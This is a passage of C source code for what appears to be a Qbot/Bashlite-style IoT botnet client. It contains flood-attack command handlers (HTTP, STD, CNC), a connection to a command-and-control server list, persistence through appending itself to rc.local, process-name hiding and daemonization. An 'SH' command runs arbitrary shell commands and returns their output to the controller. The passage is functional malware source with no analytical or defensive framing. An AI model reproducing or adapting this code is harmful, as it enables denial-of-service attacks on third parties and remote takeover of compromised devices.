2146. while(hi != NULL)
2147. {
2148. int i = 0;
2149. while(i < threads){
2150. if(!listFork())
2151. {
2152. sendHTTP2(hi, time, sleepcheck, sleeptime);
2153. close(mainCommSock);
2154. sleep(10);
2155. system("rm -fr /tmp/yuagwduiagwdhg");
2156. _exit(0);
2157. }
2158. i++;
2159. }
2160. hi = strtok(NULL, ",");
2161. }
2162. } else{
2163. int i = 0;
2164. while(i < threads){
2165. if(!listFork()){
2166. sendHTTP2(ip, time, sleepcheck, sleeptime);
2167. close(mainCommSock);
2168. sleep(10);
2169. system("rm -fr /tmp/yuagwduiagwdhg");
2170. _exit(0);
2171. }
2172. i++;
2173. }
2174. }
2175. }
2176.  
2177. if(!strcmp(argv[0], "VIEWPAGE"))
2178. {
2179. if(argc < 2){
2180. sockprintf(mainCommSock, "VIEWPAGE <http ip url>");
2181. return;
2182. }else{
2183. char *url = argv[1];
2184. char *UA = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
2185. system("mkdir /tmp/yuagwduiagwdhg");
2186. char *command[80];
2187. sprintf(command,"wget -O /tmp/yuagwduiagwdhg/a -U \"");
2188. strcat(command, UA);
2189. strcat(command,"\" -q ");
2190. strcat(command, url);
2191. system(command);
2192. system("rm -fr /tmp/yuagwduiagwdhg");
2193. }
2194. }
2195.  
2196. if(!strcmp(argv[0], "CNC"))
2197. {
2198. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
2199. {
2200. sockprintf(mainCommSock, "CNC <target> <port> <time>");
2201. return;
2202. }
2203.  
2204. unsigned char *ip = argv[1];
2205. int port = atoi(argv[2]);
2206. int time = atoi(argv[3]);
2207.  
2208. if(strstr(ip, ",") != NULL)
2209. {
2210. unsigned char *hi = strtok(ip, ",");
2211. while(hi != NULL)
2212. {
2213. if(!listFork())
2214. {
2215. sendCNC(hi, port, time);
2216. close(mainCommSock);
2217. _exit(0);
2218. }
2219. hi = strtok(NULL, ",");
2220. }
2221. } else {
2222. if (listFork()) { return; }
2223.  
2224. sendCNC(ip, port, time);
2225. _exit(0);
2226. }
2227. }
2228.  
2229. if(!strcmp(argv[0], "STD"))
2230. {
2231. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
2232. {
2233. sockprintf(mainCommSock, "STD <target> <port> <time>");
2234. return;
2235. }
2236.  
2237. unsigned char *ip = argv[1];
2238. int port = atoi(argv[2]);
2239. int time = atoi(argv[3]);
2240.  
2241. if(strstr(ip, ",") != NULL)
2242. {
2243. unsigned char *hi = strtok(ip, ",");
2244. while(hi != NULL)
2245. {
2246. if(!listFork())
2247. {
2248. sendSTD(hi, port, time);
2249. _exit(0);
2250. }
2251. hi = strtok(NULL, ",");
2252. }
2253. } else {
2254. if (listFork()) { return; }
2255.  
2256. sendSTD(ip, port, time);
2257. _exit(0);
2258. }
2259.  
2260. }
2261.  
2262. if(!strcmp(argv[0], "KILLATTK"))
2263. {
2264. int killed = 0;
2265. unsigned long i;
2266. for (i = 0; i < numpids; i++) {
2267. if (pids[i] != 0 && pids[i] != getpid()) {
2268. kill(pids[i], 9);
2269. killed++;
2270. }
2271. }
2272.  
2273. if(killed > 0)
2274. {
2275. sockprintf(mainCommSock, "Killed %d.", killed);
2276. } else {
2277. sockprintf(mainCommSock, "None Killed.");
2278. }
2279. }
2280.  
2281. if(!strcmp(argv[0], "LOLNOGTFO"))
2282. {
2283. exit(0);
2284. }
2285. }
2286.  
2287. int initConnection()
2288. {
2289. unsigned char server[4096];
2290. memset(server, 0, 4096);
2291. if(mainCommSock) { close(mainCommSock); mainCommSock = 0; }
2292. if(currentServer + 1 == SERVER_LIST_SIZE) currentServer = 0;
2293. else currentServer++;
2294.  
2295. strcpy(server, commServer[currentServer]);
2296. int port = 443;
2297. if(strchr(server, ':') != NULL)
2298. {
2299. port = atoi(strchr(server, ':') + 1);
2300. *((unsigned char *)(strchr(server, ':'))) = 0x0;
2301. }
2302.  
2303. mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
2304.  
2305. if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
2306.  
2307. return 0;
2308. }
2309.  
2310. int getOurIP()
2311. {
2312. int sock = socket(AF_INET, SOCK_DGRAM, 0);
2313. if(sock == -1) return 0;
2314.  
2315. struct sockaddr_in serv;
2316. memset(&serv, 0, sizeof(serv));
2317. serv.sin_family = AF_INET;
2318. serv.sin_addr.s_addr = inet_addr("8.8.8.8");
2319. serv.sin_port = htons(53);
2320.  
2321. int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
2322. if(err == -1) return 0;
2323.  
2324. struct sockaddr_in name;
2325. socklen_t namelen = sizeof(name);
2326. err = getsockname(sock, (struct sockaddr*) &name, &namelen);
2327. if(err == -1) return 0;
2328.  
2329. ourIP.s_addr = name.sin_addr.s_addr;
2330.  
2331. int cmdline = open("/proc/net/route", O_RDONLY);
2332. char linebuf[4096];
2333. while(fdgets(linebuf, 4096, cmdline) != NULL)
2334. {
2335. if(strstr(linebuf, "\t00000000\t") != NULL)
2336. {
2337. unsigned char *pos = linebuf;
2338. while(*pos != '\t') pos++;
2339. *pos = 0;
2340. break;
2341. }
2342. memset(linebuf, 0, 4096);
2343. }
2344. close(cmdline);
2345.  
2346. if(*linebuf)
2347. {
2348. int i;
2349. struct ifreq ifr;
2350. strcpy(ifr.ifr_name, linebuf);
2351. ioctl(sock, SIOCGIFHWADDR, &ifr);
2352. for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
2353. }
2354.  
2355. close(sock);
2356. }
2357.  
2358. char *getBuild()
2359. {
2360. #ifdef MIPS_BUILD
2361. return "MIPS";
2362. #elif MIPSEL_BUILD
2363. return "MIPSEL";
2364. #elif X86_BUILD
2365. return "X86";
2366. #elif ARM_BUILD
2367. return "ARM";
2368. #elif PPC_BUILD
2369. return "POWERPC";
2370. #else
2371. return "420BLAZEITFGT";
2372. #endif
2373. }
2374.  
2375. int main(int argc, unsigned char *argv[])
2376. {
2377. char *mynameis = "";
2378. if(SERVER_LIST_SIZE <= 0) return 0;
2379. printf("BUILD %s\n", getBuild());
2380. strncpy(argv[0],"",strlen(argv[0]));
2381. argv[0] = "";
2382. prctl(PR_SET_NAME, (unsigned long) mynameis, 0, 0, 0);
2383. srand(time(NULL) ^ getpid());
2384. init_rand(time(NULL) ^ getpid());
2385. pid_t pid1;
2386. pid_t pid2;
2387. int status;
2388. int dupthing = 0;
2389.  
2390. char cwd[256],*str;
2391. FILE *file;
2392. str="/etc/rc.d/rc.local";
2393. file=fopen(str,"r");
2394. if (file == NULL) {
2395. str="/etc/rc.conf";
2396. file=fopen(str,"r");
2397. }
2398. if (file != NULL) {
2399. char outfile[256], buf[1024];
2400. int i=strlen(argv[0]), d=0;
2401. getcwd(cwd,256);
2402. if (strcmp(cwd,"/")) {
2403. while(argv[0][i] != '/') i--;
2404. sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
2405. while(!feof(file)) {
2406. fgets(buf,1024,file);
2407. if (!strcasecmp(buf,outfile)) d++;
2408. }
2409. if (d == 0) {
2410. FILE *out;
2411. fclose(file);
2412. out=fopen(str,"a");
2413. if (out != NULL) {
2414. fputs(outfile,out);
2415. fclose(out);
2416. }
2417. }
2418. else fclose(file);
2419. }
2420. else fclose(file);
2421. }
2422.  
2423. getOurIP();
2424.  
2425. if (pid1 = fork()) {
2426. waitpid(pid1, &status, 0);
2427. exit(0);
2428. } else if (!pid1) {
2429. if (pid2 = fork()) {
2430. exit(0);
2431. } else if (!pid2) {
2432. } else {
2433. zprintf("fork failed\n");
2434. }
2435. } else {
2436. zprintf("fork failed\n");
2437. }
2438.  
2439. setsid();
2440. chdir("/");
2441.  
2442. signal(SIGPIPE, SIG_IGN);
2443.  
2444. while(1)
2445. {
2446. if(initConnection()) { sleep(30); continue; }
2447.  
2448. sockprintf(mainCommSock, "BUILD %s", getBuild());
2449.  
2450. char commBuf[4096];
2451. int got = 0;
2452. int i = 0;
2453. while((got = recvLine(mainCommSock, commBuf, 4096)) != -1)
2454. {
2455. for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
2456. unsigned int *newpids, on;
2457. for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
2458. pids[on - 1] = 0;
2459. numpids--;
2460. newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
2461. for (on = 0; on < numpids; on++) newpids[on] = pids[on];
2462. free(pids);
2463. pids = newpids;
2464. }
2465.  
2466. commBuf[got] = 0x00;
2467.  
2468. trim(commBuf);
2469.  
2470. if(strstr(commBuf, "PING") == commBuf)
2471. {
2472. sockprintf(mainCommSock, "PONG");
2473. continue;
2474. }
2475. if(strstr(commBuf, "DUP") == commBuf){
2476. dupthing++;
2477. zprintf("aparently im a dupe\n");
2478. if(dupthing > 20){
2479. exit(0);
2480. }
2481. break;
2482. }
2483.  
2484. unsigned char *message = commBuf;
2485.  
2486. if(*message == '!')
2487. {
2488. unsigned char *nickMask = message + 1;
2489. while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
2490. if(*nickMask == 0x00) continue;
2491. *(nickMask) = 0x00;
2492. nickMask = message + 1;
2493.  
2494. message = message + strlen(nickMask) + 2;
2495. while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
2496.  
2497. unsigned char *command = message;
2498. while(*message != ' ' && *message != 0x00) message++;
2499. *message = 0x00;
2500. message++;
2501.  
2502. unsigned char *tmpcommand = command;
2503. while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
2504.  
2505. if(strcmp(command, "SH") == 0)
2506. {
2507. unsigned char buf[1024];
2508. int command;
2509. if (listFork()) continue;
2510. memset(buf, 0, 1024);
2511. szprintf(buf, "%s 2>&1", message);
2512. command = fdpopen(buf, "r");
2513. while(fdgets(buf, 1024, command) != NULL)
2514. {
2515. trim(buf);
2516. sockprintf(mainCommSock, "%s", buf);
2517. memset(buf, 0, 1024);
2518. sleep(1);
2519. }
2520. fdpclose(command);
2521. exit(0);
2522. }
2523.  
2524. unsigned char *params[10];
2525. int paramsCount = 1;
2526. unsigned char *pch = strtok(message, " ");
2527. params[0] = command;
2528.  
2529. while(pch)
2530. {
2531. if(*pch != '\n')
2532. {
2533. params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
2534. memset(params[paramsCount], 0, strlen(pch) + 1);
2535. strcpy(params[paramsCount], pch);
2536. paramsCount++;
2537. }
2538. pch = strtok(NULL, " ");
2539. }
2540.  
2541. processCmd(paramsCount, params);
2542.  
2543. if(paramsCount > 1)
2544. {
2545. int q = 1;
2546. for(q = 1; q < paramsCount; q++)
2547. {
2548. free(params[q]);
2549. }
2550. }
2551. }
2552. }
2553. sleep(30);
2554. }
2555.  
2556. return 0;
2557. printf("client exiting");
2558. }